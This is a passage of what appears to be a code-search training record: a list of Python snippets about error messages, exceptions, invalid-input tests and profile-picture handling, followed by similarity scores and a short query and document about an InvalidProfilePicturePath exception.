res.status_code == 400\n assert res.data_info.message == ResponseText.MESSAGE_REGISTER_USER_INVALID", "def test_create_tag_invalid_payload(self):\n\n tag_payload = {'name': ''}\n response = self.client.post(URL_TAGS, tag_payload)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def __init__(\n self, user_message: str, yaml_path: str, segment: Optional[str] = None\n ) -> None:\n super().__init__(\n user_message=user_message, yaml_path=yaml_path, segment=segment)", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def test_construct_frame_tag_error(attributes, exception, error_msg):\n with pytest.raises(exception) as exc:\n Frame(**attributes)\n\n assert error_msg in str(exc)", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def error(self, **data):\n template_specification = dict(mainContent=\"../error\", title=\"Error page\", data=data)\n template_specification = self._fill_user_specific_attributes(template_specification)\n return self.fill_default_attributes(template_specification)", "def __init__(__self__, *,\n ip_tag_type: Optional[pulumi.Input[str]] = None,\n tag: Optional[pulumi.Input[str]] = None):\n if ip_tag_type is not None:\n pulumi.set(__self__, \"ip_tag_type\", ip_tag_type)\n if tag is not None:\n pulumi.set(__self__, \"tag\", tag)", "def __init__(self, schemas):\n # Prepend \"string\" to handle system errors\n schemas = [PrimitiveSchema(data_type=STRING)] + list(schemas)\n super(ErrorUnionSchema, self).__init__(schemas=schemas)", "def __init__(self, msg):\n\n super(HTTPError, self).__init__(msg)\n self.msg = msg", "def username_error(self, msg):\n print('\\nusername error: %s' % msg, file=self.console)\n self.username = input('Username: ')", "def __init__(__self__, *,\n error_code: int,\n error_message: str,\n exception_message: str,\n recommended_action: str):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)\n pulumi.set(__self__, \"exception_message\", exception_message)\n pulumi.set(__self__, \"recommended_action\", recommended_action)", "def __init__(self, message):\n config.log.critical(\"Not Supported: %s\" % (message))", "def __init__(self, message):\n config.log.critical(\"Not Supported: %s\" % (message))", "def test_add_tag_invalid(self):\n payload = {'name': ''}\n res = self.client.post(TAGS_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, tag):\n self._tag = tag\n SequentialBackoffTagger.__init__(self, None)", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def __init__(self, message, code, *args):\n self.message = message\n self.code = code\n super(TwitterException, self).__init__(message, code, *args)", "def _error(self, message):\r\n dlg = wx.MessageDialog(self, message,\r\n 'xmi2magik',\r\n wx.OK | wx.ICON_ERROR\r\n )\r\n dlg.ShowModal()\r\n dlg.Destroy()", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def __init__(self, user_data=bytearray(bytes(14))):\n self._user_data = _normalize(create_empty(0x00), user_data)", "def test_bad_register(self):\n body, code = self.post(f\"/users\", bob, bob_creds)\n self.assertEqual(400, code)\n self.assertEqual({\"error\": \"Invalid request.\"}, body)", "def test_invalid_as_name(self):\n\n def make_bad_tag():\n class BadTag(ttag.helpers.AsTag):\n as_ = ttag.Arg(named=True)\n\n self.assertRaises(template.TemplateSyntaxError, make_bad_tag)", "def error(self, messages=None):\n return StateError(\n created_at=self.created_at,\n started_at=self.started_at,\n messages=messages\n )", "def __init__(self, status_code, sdk_error):\n super(ServiceResponseException, self).__init__(sdk_error.error_msg)\n self.status_code = status_code\n self.error_code = sdk_error.error_code\n self.request_id = sdk_error.request_id", "def error(self, msg, *args, **kwargs):\n pass", "def test_registeration_invalid_email(self):\n response = self.signup_a_user(self.user_invalid_email)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"errors\"][\"email\"],\n [\"Enter a valid email address.\"]\n )\n self.assertNotIn(\"token\", response.data)", "def test_bad_request_anon_user_invalid_email(self, zendesk_mock_class, datadog_mock):\r\n fields = self._anon_fields.copy()\r\n fields[\"email\"] = \"This is not a valid email address!\"\r\n resp = self._build_and_run_request(self._anon_user, fields)\r\n self._assert_bad_request(resp, \"email\", zendesk_mock_class, datadog_mock)", "def set_error(self, name, value):\n self.errors[name] = value", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"error_message\")", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"error_message\")" ]
[ "0.56462985", "0.54964924", "0.536261", "0.5255886", "0.52409583", "0.5214799", "0.51638514", "0.51309276", "0.512227", "0.5116152", "0.50880295", "0.5065294", "0.50539815", "0.5043654", "0.50230527", "0.5009636", "0.49937543", "0.499186", "0.49844167", "0.49798706", "0.49764267", "0.4972648", "0.49568847", "0.4954867", "0.494364", "0.49326766", "0.4930944", "0.49288702", "0.48990867", "0.48990867", "0.48990867", "0.48912236", "0.4884452", "0.48831207", "0.4854587", "0.4848369", "0.48367506", "0.47945312", "0.47823814", "0.47744393", "0.47632828", "0.4747407", "0.47446847", "0.47407833", "0.47159714", "0.47134435", "0.47107378", "0.46995386", "0.4696905", "0.46872208", "0.4654463", "0.4650296", "0.46359056", "0.46349666", "0.4631727", "0.46123043", "0.4605602", "0.4600006", "0.45986286", "0.4597451", "0.45954528", "0.45911494", "0.4590956", "0.45903966", "0.45822108", "0.4581515", "0.45799917", "0.45795068", "0.4571716", "0.45687822", "0.4567664", "0.4563971", "0.45588973", "0.45532432", "0.4548248", "0.4537771", "0.45357794", "0.4532106", "0.451978", "0.45176393", "0.45104873", "0.4504935", "0.4504935", "0.4504767", "0.4504725", "0.4504688", "0.45031774", "0.4501836", "0.4500811", "0.4498059", "0.44971523", "0.4495802", "0.44936353", "0.44912964", "0.44883385", "0.44842538", "0.44744223", "0.44661713", "0.44552502", "0.44548056", "0.44548056" ]
0.0
-1
Initializes InvalidProfilePicturePath with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_user_profile_picture_invalid_image_fails(self):\n image_upload_url = PROCEDURE_URL\n\n payload = {\n 'name': 'temp',\n 'speciality': [self.speciality.pk],\n 'image': 'invalid image',\n 'overview': 'bla bla bla'\n }\n\n res = self.client.post(\n image_upload_url,\n payload,\n format=\"multipart\"\n )\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def test_upload_profile_pic(self):\n url = 'https://cdn.business2community.com/wp-content/uploads/2017/08/blank-profile-picture-973460_640.png'\n\n details = self.new_user.upload_profile_pic(url)\n\n self.assertEqual(self.new_user.profile_pic, details.get('url'))\n destroy(details.get('public_id'))\n\n # Test if invalid image path is inserted\n with self.assertRaises(Exception):\n details = self.new_user.upload_profile_pic('Random path')\n self.assertEqual(self.new_user.profile_pic, details.get('url'))", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self, message='', path=(), notes=()):\n self.message = message\n self.plain_message = message # for backwards compat\n self.path = list(path)\n self.notes = notes\n super(PlotlyGraphObjectError, self).__init__(message)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def initErrMsgImage(self):\n draw = ImageDraw.Draw(self.errMsgImage)\n # Outline\n draw.rectangle((0,0,self.width-1,self.height-1),outline=255,fill=0)\n # Stripes\n nLines = 8\n lineSlope = self.height/2\n for i in range(0,nLines):\n x0 = i*self.width/(2*nLines)\n y0 = 0\n x1 = x0 - lineSlope\n y1 = self.height\n draw.line((x0,y0,x1,y1),fill=255)\n # Text box\n x0 = self.width/4\n y0 = 0\n x1 = self.width-1\n y1 = self.height-1\n draw.rectangle((x0,y0,x1,y1),outline=255,fill=0)\n # Error symbols\n x0 = self.width/16\n y0 = 3*self.height/4\n x1 = 3*self.width/16\n y1 = y0\n x2 = (x0 + x1)/2\n y2 = self.height/4\n draw.polygon((x0,y0,x1,y1,x2,y2),outline=255,fill=255)\n draw.text((x0+6,y2+5),'!',font=self.font,fill=0)\n return", "def error_no_profile():\r\n tkMessageBox.showerror(\"Błąd, Nie wybrano profilu.\",\r\n \"Należy dokonać wyboru profilu do filtrowania danych, \"\r\n \"szczegóły poszczególnych profili można znaleść w Menadżeże Profili\")", "def __init__(self, path: pathlib.Path, msg: str) -> None:\n super().__init__(f\"Could not parse the components file {path}: {msg}\")\n self.osi_path = path\n self.osi_msg = msg", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, real_path, first_path, second_path):\n\t\tsuper(RecursionError, self).__init__(real_path, first_path, second_path)", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def profile_pic(self):\n raise AttributeError('profile_pic is not a readable attribute')", "def test_requestMalformedAvatarId(self):\n d = self._requestAvatarId(\n UsernamePassword(self.localpart, self.password))\n return self.assertFailure(d, errors.MissingDomainPart)", "def get_server_profile_error_message(profile_name):\n FusionUIBase.navigate_to_section(SectionType.SERVER_PROFILES, time_for_loading=5)\n if not VerifyServerProfile.verify_server_profile_exist(profile_name, fail_if_false=False):\n ui_lib.fail_test(\"Proflie %s is not present, hence exiting\" % profile_name)\n else:\n CommonOperationServerProfile.click_server_profile(profile_name=profile_name, time_for_loading=4)\n return CommonOperationServerProfile.get_profile_error_message(timeout=20, fail_if_false=False)", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def error(request):\r\n #Retrieve information which caused an error\r\n messages = get_messages(request)\r\n info =''\r\n try:\r\n user = _validate_and_get_geniuser(request)\r\n return profile(request, info, info, messages)\r\n except:\r\n return _show_login(request, 'accounts/login.html', {'messages' : messages})", "def errpath(self):\n return None", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def initialize():\n pinfo = pathinfo()\n\n if not pinfo:\n raise Error('cannot decide profile directory, $SUZUPROFILEDIR, $APPDATA, or $HOME should be configured.')\n\n # dig profdir\n if not os.path.isdir(pinfo['profiledir']):\n os.mkdir(pinfo['profiledir'])\n\n # test dir\n if not os.path.isdir(pinfo['profiledir']):\n raise Error('profile directory {} does not exist, nor cannot create'.format(pinfo['profiledir']))\n\n # test profile data file\n if not os.path.isfile(pinfo['config']):\n with open(pinfo['config'], 'w') as stream:\n json.dump(config.default, stream, indent=2, sort_keys=True)\n\n # test file (do not care on the contents)\n if not os.path.isfile(pinfo['config']):\n raise Error('config file {} does not exist, nor cannot create'.format(pinfo['config']))\n\n return pinfo", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def input_error_checking(profile, tarchive_path, upload_id, usage):\n\n if not profile:\n message = '\\n\\tERROR: you must specify a profile file using -p or ' \\\n '--profile option'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.MISSING_ARG)\n\n if not tarchive_path:\n message = '\\n\\tERROR: you must specify a DICOM archive path using -t or ' \\\n '--tarchive option'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.MISSING_ARG)\n\n if not upload_id:\n message = '\\n\\tERROR: you must specify an UploadID using -u or ' \\\n '--uploadid option'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.MISSING_ARG)\n\n if os.path.isfile(profile):\n sys.path.append(os.path.dirname(profile))\n config_file = __import__(os.path.basename(profile[:-3]))\n else:\n message = '\\n\\tERROR: you must specify a valid profile file.\\n' + \\\n profile + ' does not exist!'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.INVALID_PATH)\n\n if not os.path.isfile(tarchive_path):\n message = '\\n\\tERROR: you must specify a valid DICOM archive path.\\n' + \\\n tarchive_path + ' does not exist!'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.INVALID_PATH)\n\n try:\n int(upload_id)\n except ValueError:\n message = '\\n\\tERROR: you must specify an integer value for --uploadid option.\\n'\n print(message)\n print(usage)\n\n return config_file", "def __init__(self, msg, path_to_item=None):\n self.path_to_item = path_to_item\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiAttributeError, self).__init__(full_msg)", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def profile_photo(self):\n images_directory_index = 6\n filepath = None\n photo = self.profile_photo_path\n if photo is not None:\n photo_dir = photo.split(\"/\")[images_directory_index:]\n filepath = \"/\".join(photo_dir)\n return filepath", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def profile_image_src(self, size):\n if self.profile_image:\n return join_path(STATIC_IMAGE_URL, 'users', \"{}.{}.{}.png\".format(self.id, self.profile_image, size)).replace(\"\\\\\", '/')\n return join_path(STATIC_IMAGE_URL, \"users\", \"no_profile.jpg\").replace(\"\\\\\", '/')", "def __init__(self, security_identifier, profile_path):\n super(UserProfile, self).__init__()\n self.profile_path = profile_path\n self.security_identifier = security_identifier", "def __init__(self, obj):\n super().__init__(\"File {} doesn't exist or invalid.\".format(obj))", "def save_fail_img(self):\n self.save_img(\"Email\")", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def user_profile_avatar_path(user_info, filename):\n return 'user_{0}/avatars/{1}'.format(instance.user.id, filename)", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def get_picture(self):\n\t\tno_picture = settings.STATIC_URL + 'img/img_avatar.png'\n\t\ttry:\n\t\t\treturn self.picture.url\n\t\texcept:\n\t\t\treturn no_picture", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def test_resumeWhenFileDoesNotExist(self):\n fp = FilePath(self.mktemp())\n\n error = self.assertRaises(\n OSError, self.makeConnectedDccFileReceive, fp.path, resumeOffset=1\n )\n\n self.assertEqual(errno.ENOENT, error.errno)", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def test_photo_init_error_no_camera_name(full_photo_params):\n del full_photo_params['camera']['name']\n with pytest.raises(KeyError):\n Photo(**full_photo_params)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def on_init_fail(self, event_time, message):\n pass", "def testUidMissingError(self):\n self.assertRaises(ValueError, dicom_path.Path, 'p', 'l', 'd', 's', None,\n '4.5.6')\n self.assertRaises(ValueError, dicom_path.Path, 'p', 'l', 'd', 's', 'stuid',\n None, '7.8.9')", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def test_constructor_with_wrong_folder_name_should_raise_exception(self):\n with self.assertRaises(UploaderException) as cm:\n GDriveUploader(None, 'my_wrong_folder_name!')\n\n self.assertEqual(\n UploaderException.INVALID_DIR_NAME,\n cm.exception.code\n )", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def test_user_profile_form_invalid(self):\n form = UserProfileForm(data={\n 'default_phone_number': 'test_phone_number',\n 'default_town_or_city': 'test_town_or_city',\n 'default_street_address1': 'test_street1',\n 'default_street_address2': 'test_street2',\n 'default_county': 'test_county',\n 'default_country': 'test_country',\n })\n self.assertFalse(form.is_valid())\n self.assertEquals(len(form.errors), 1)", "def test_photo_init_error_no_camera(full_photo_params):\n del full_photo_params['camera']\n with pytest.raises(KeyError):\n Photo(**full_photo_params)", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def profile_image_url(self, profile_image_url):\n\n self._profile_image_url = profile_image_url", "def __init__(self, profile: str = \"default\", fallback_to_default = True):\n\t\tif fallback_to_default:\n\t\t\tif not get_config(f\"libupload.{profile}\"):\n\t\t\t\tprofile = \"default\"\n\n\t\tif not get_config(f\"libupload.{profile}\"):\n\t\t\traise AssertionError(f\"Profile {profile} not found\")\n\n\t\tself.method = get_config(f\"libupload.{profile}.method\")\n\t\tself.destination_path_base = Path(get_config(f\"libupload.{profile}.base_dir\"))\n\t\tself.host = get_config(f\"libupload.{profile}.host\")\n\t\tself.port = get_config(f\"libupload.{profile}.port\")\n\t\tself.server = self.host if self.port is None else f\"{self.host}:{self.port}\"\n\t\tself.username = get_config(f\"libupload.{profile}.username\")\n\t\tself.password = get_config(f\"libupload.{profile}.password\")", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def test_invalid_image(self):\n with open('apps/upload/__init__.py', 'rb') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(400, r.status_code)\n json_r = json.loads(r.content)\n eq_('error', json_r['status'])\n eq_('Invalid or no image received.', json_r['message'])\n eq_('The submitted file is empty.', json_r['errors']['image'][0])", "def _syntax_error(msg):\n try:\n filename = stream.name\n except AttributeError:\n filename = None\n return RFC822SyntaxError(filename, lineno, msg)", "def _error(msg):\n\n error(None, msg)", "def test_requestNonexistentAvatarId(self):\n username = '%s@%s' % (self.localpart, self.domain)\n d = self._requestAvatarId(\n UsernamePassword(username, self.password))\n return self.assertFailure(d, errors.NoSuchUser)", "def photo_path(instance, filename):\n return 'users/{0}/{1}'.format(instance.user.username, '.'.join(['profile-photo', filename.split('.')[-1]]))", "def __init__(\n self, user_message: str, yaml_path: str, segment: Optional[str] = None\n ) -> None:\n super().__init__(\n user_message=user_message, yaml_path=yaml_path, segment=segment)", "def get_error_file(self):\n pass", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def regexp_error_msg(self, regexp_error_msg):\n\n self._regexp_error_msg = regexp_error_msg", "def __init__(self, message=\"\"):\n super(AutomationError, self).__init__(message)", "def initErrorCheck(self):\n #setup pvs to check\n self.error_bcs = \"BCS:MCC0:1:BEAMPMSV\"\n self.error_mps = \"SIOC:SYS0:ML00:CALCOUT989\"\n self.error_gaurdian = \"SIOC:SYS0:ML00:AO466\"\n self.error_und_tmit = \"BPMS:UND1:3290:TMITTH\"\n\n #pv to bypass the error pause\n self.error_bypass = \"SIOC:SYS0:ML00:CALCOUT990\"\n self.error_tripped = \"SIOC:SYS0:ML00:CALCOUT991\"\n\n #set the unlatch pv to zero\n epics.caput(self.error_bypass, 0)\n epics.caput(self.error_tripped,0)", "def pcp_internal_error(self, msg):\n\t\tif self.errMsg:\n\t\t\tdel self.errMsg\n\n\t\tself.errMsg = msg", "def test_iter_errors_invalid_resume(self):\n errors = list(resumeschema.iter_errors(self.invalid_resume))\n self.assertEqual(len(errors), 3)\n\n self.assertEqual(list(errors[0].path), ['basics'])\n self.assertEqual(\n errors[0].message, 'Additional properties are not allowed (u\\'first_name\\', u\\'last_name\\' were unexpected)'\n )\n\n self.assertEqual(list(errors[1].path), ['basics', 'profiles'])\n self.assertEqual(\n errors[1].message,\n '{u\\'username\\': u\\'neutralthoughts\\', u\\'network\\': u\\'Facebook\\'} is not of type u\\'array\\''\n )\n\n self.assertEqual(list(errors[2].path), ['work'])\n self.assertEqual(\n errors[2].message,\n ('{u\\'website\\': u\\'http://piedpiper.com\\', u\\'startDate\\': u\\'2013-12-01\\', u\\'highlights\\': '\n '[u\\'Build an algorithm\\'], u\\'company\\': u\\'Pied Piper\\', u\\'summary\\': '\n 'u\\'Pied Piper is a multi-platform technology.\\', u\\'position\\': u\\'CEO/President\\'} '\n 'is not of type u\\'array\\'')\n )", "def test_info_fail(self):\n path = \"non_existing_audio.wav\"\n with self.assertRaisesRegex(RuntimeError, path):\n self._info(path)", "def ProduceExtractionError(self, message, path_spec=None):\n # type: (str, PathSpec) -> None\n print(\"ERROR \" + message)\n print(pprint(vars(path_spec)))", "def set_user_profile_picture(user_id, file_name):\n\n user = User.query.get(user_id)\n \n user.profile_picture = file_name\n db.session.commit()", "def _add_profile_image(self):\r\n self.profile_image_is_set = True\r\n file_name = filedialog.askopenfilename(initialdir=\"/\", title=self.language.refactor(\"Select GIF file\"),\r\n filetypes=((\"GIF files\", \"*.gif\"),))\r\n if file_name == '':\r\n self.new_user_window.lift()\r\n return\r\n\r\n self.add_profile_gif_button.destroy()\r\n gif_canvas = Ctk.CCanvas(self.new_user_window, corners='angular', size=(180, 180),\r\n bg=self.new_user_window['background'])\r\n gif_canvas.create_gif(gif_path=file_name, corner='round', size=(175, 175), pos=(90, 90),\r\n transparent=True, speed='normal')\r\n gif_canvas.place(*(15, 50))\r\n\r\n self.gif_file_path = file_name\r\n\r\n self.new_user_window.lift()", "def delete_profile_pic(sender, instance, **kwargs):\n if instance.profile_picture:\n if instance.profile_picture.name != \"default.png\":\n path = instance.profile_picture.path\n os.remove(path)", "def get_profile_picture_url(cls, filename):\n if filename is None:\n return None\n profile_picture = bucket.blob('images/users/'+filename)\n if profile_picture.exists():\n profile_picture.make_public()\n return profile_picture.public_url\n return None", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def add_error(self, path, error):\n self.errors = merge_errors(self.errors, self._make_error(path, error))", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def _error(self, message):\r\n dlg = wx.MessageDialog(self, message,\r\n 'xmi2magik',\r\n wx.OK | wx.ICON_ERROR\r\n )\r\n dlg.ShowModal()\r\n dlg.Destroy()", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def init_error_files(self): \n \n dir_path = self.init_logs_directory()\n log_errors = self.join_path(dir_path, PATH_FOR_LOG_ERRORS)\n \n return log_errors", "def __init__(\n self,\n img_path: Union[str, \"Path\"],\n profile: dict,\n crop_size: int,\n padding: int = 0,\n **kwargs\n ):\n super().__init__()\n self.img_path = img_path\n self.crop_size = crop_size\n self.padding = padding\n\n profile.update(blockxsize=crop_size, blockysize=crop_size, tiled=True, **kwargs)\n\n # Create the file and get the indices of write locations\n with rasterio.open(self.img_path, \"w\", **profile) as dst:\n self.height = dst.height\n self.width = dst.width\n self.profile = dst.profile\n\n _y0s = range(0, self.height, self.crop_size)\n _x0s = range(0, self.width, self.crop_size)\n self.y0x0 = list(itertools.product(_y0s, _x0s))", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def profile_pic(self, client_file_storage):\n\n # If we already have a profile picture, remove it\n if self.profile_pic_filename:\n filepath = os.path.join(\n current_app.config['UPLOADED_IMAGES_DEST'],\n self.profile_pic_filename)\n os.remove(filepath)\n self.profile_pic_filename = None\n self.profile_pic_url = None\n\n # This uploads & saves the file on the server\n # NOTE: It uses the secure_filename function...\n server_filename = images.save(client_file_storage)\n\n # Generate the URL to this file\n url = images.url(server_filename)\n\n # Store information with the user\n self.profile_pic_filename = server_filename\n self.profile_pic_url = url", "def profile_upload_path(instance, filename):\n return f'profile/{instance.user.id}/{filename}'", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def test_profile_phone_number_exceptions(self, bad_number):\n with mute_signals(post_save):\n profile = ExamProfileFactory(profile__phone_number=bad_number)\n with self.assertRaises(InvalidProfileDataException):\n CDDWriter.profile_phone_number_to_raw_number(profile)\n with self.assertRaises(InvalidProfileDataException):\n CDDWriter.profile_phone_number_to_country_code(profile)", "def _validate_path(self, key, path):\n if path is None:\n raise TypeError(\"FileLink.path can not be None\")\n \n if not isinstance(path, (str, unicode)):\n raise TypeError(\"FileLink.path should be a str or unicode, \"\n \"not %s\" % path.__class__.__name__)\n return path", "def test_get_predefined_config_path_framework_failure(self) -> None:\n with self.assertRaises(Exception):\n get_predefined_config_path(\n framework=\"onnx\",\n domain=\"image_recognition\",\n )", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def __init__(self, filepath='./data/image_clean_pat.npy'):\n self.filepath = filepath\n assert '.npy' in filepath\n if not os.path.exists(filepath):\n print(\"[!] Data file not exists\")\n sys.exit(1)", "def test_invalid_image_extensions(self):\n with open('apps/upload/tests/media/test_invalid.ext', 'rb') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(400, r.status_code)\n json_r = json.loads(r.content)\n eq_('error', json_r['status'])\n eq_('Invalid or no image received.', json_r['message'])\n eq_('Please upload an image with one of the following extensions: '\n 'jpg, jpeg, png, gif.', json_r['errors']['__all__'][0])", "def __init__(self, status: str, info=\"\", error=\"\", image=None, sound=None, url=None):\n self._status = status\n self._info = info\n self._error = error\n self._image = image\n self._sound = sound\n self._url = url\n\n if not isinstance(status, str):\n raise TypeError(\"status must be a string\")\n if not isinstance(info, str):\n raise TypeError(\"info must be a string\")\n if not isinstance(error, str):\n raise TypeError(\"error must be a string\")\n if status not in MokadiInfo._allowed_status:\n raise ValueError(\"status must be in {0}\".format(\n MokadiInfo._allowed_status))\n if image is not None and len(image) > 0:\n if not image.startswith(\"http\") and not os.path.exists(image):\n raise FileNotFoundError(image)\n if sound is not None and len(sound) > 0:\n if not os.path.exists(sound):\n raise FileNotFoundError(sound)", "def _error_resource_callback(self, msg_id, error_message):\n for callback in self._callback['error']:\n callback(error_message)", "def error_message(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"error_message\")", "def error_obj(message):\n return {\n 'error': message,\n 'success': False\n }", "def __validate_location(self):\n if not os.path.exists(self._file_path):\n raise FileNotFoundError(\"Directory does not exist\")\n if not os.path.isfile(self._path_name):\n raise FileNotFoundError('File does not exist')" ]
[ "0.5651921", "0.5624119", "0.56222874", "0.5336274", "0.52178127", "0.52178127", "0.52178127", "0.51103395", "0.5086884", "0.5018844", "0.49850813", "0.49842182", "0.49580494", "0.49038544", "0.49034742", "0.48773718", "0.48606312", "0.48144424", "0.47821972", "0.4751558", "0.47506025", "0.47404906", "0.47377828", "0.47258997", "0.47146899", "0.47123206", "0.4692803", "0.46895164", "0.46662524", "0.46537906", "0.46463123", "0.46392834", "0.4621368", "0.461716", "0.46167812", "0.4604825", "0.45985237", "0.45870885", "0.45798782", "0.45783862", "0.45754635", "0.45694822", "0.45621186", "0.4556185", "0.45554483", "0.45450053", "0.45443705", "0.4523275", "0.4521774", "0.45130208", "0.45071214", "0.44996825", "0.44924122", "0.44919372", "0.4476653", "0.44689408", "0.44611457", "0.44609773", "0.44558406", "0.44545683", "0.4451842", "0.4448196", "0.44464883", "0.4446142", "0.44409156", "0.44404247", "0.44377464", "0.44295344", "0.44262445", "0.44252706", "0.44251063", "0.4411185", "0.44090632", "0.44073534", "0.44054517", "0.44038668", "0.43926015", "0.43915418", "0.43891475", "0.43797415", "0.4376479", "0.43758586", 